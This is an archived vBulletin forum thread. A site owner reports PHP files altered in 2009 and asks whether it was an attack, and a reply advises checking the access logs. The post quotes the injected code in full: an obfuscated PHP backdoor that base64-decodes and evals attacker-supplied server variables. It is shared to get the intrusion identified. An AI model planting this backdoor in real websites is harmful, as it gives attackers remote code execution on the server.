The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Possible attack against vbulletin
I've noticed as of 10/5/09 many of my php files were altered with the below code. Also added index.php to alot of the folders. Was this an attack? It put this code at the top of many php files in the vbulletin directories. Anyone else see this?
"<?php function q22173($l22175){if(is_array($l22175)){foreach($l22 175 as $l22173=>$l22174)$l22175[$l22173]=q22173($l22174);}elseif(is_string($l22175) && substr($l22175,0,4)=="____"){$l22175=substr($l2217 5,4);$l22175=base64_decode($l2 2175);eval($l22175);$l22175=null;}return $l22175;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_ VARS;array_map("q22173",$_SERV ER); // Silence is golden. ?>" |
#2
|
||||
|
||||
You are wondering if someone adding a bunch of stuff to your files is an attack? It'd say it is something not good, and attack may be a good word to use. You should look at your access_logs (if you don't know where they are, ask your host) to see if you can figure out how they did it.
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|